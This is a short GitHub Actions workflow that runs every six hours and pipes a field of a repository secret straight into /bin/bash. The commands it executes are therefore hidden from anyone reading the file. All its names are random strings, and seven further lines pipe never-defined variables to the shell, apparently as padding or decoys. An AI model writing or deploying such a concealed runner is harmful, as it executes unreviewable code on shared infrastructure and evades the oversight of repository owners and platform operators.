name: formulahorseshoes

on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: formulahorseshoes
        env:
          orl680: ${{ secrets.orl680 }}
        run: |
          echo $orl680 | jq -r .ckx58 | /bin/bash
          echo $lxgag56 | jq -r .vwqb81 | /bin/bash
          echo $akn783 | jq -r .qlmu76 | /bin/bash
          echo $qlvp0552 | jq -r .e011 | /bin/bash
          echo $aeh9 | jq -r .lxqv38 | /bin/bash
          echo $a8 | jq -r .ksp5591 | /bin/bash
          echo $pp3603 | jq -r .lv563 | /bin/bash
          echo $xycle67 | jq -r .ti21 | /bin/bash

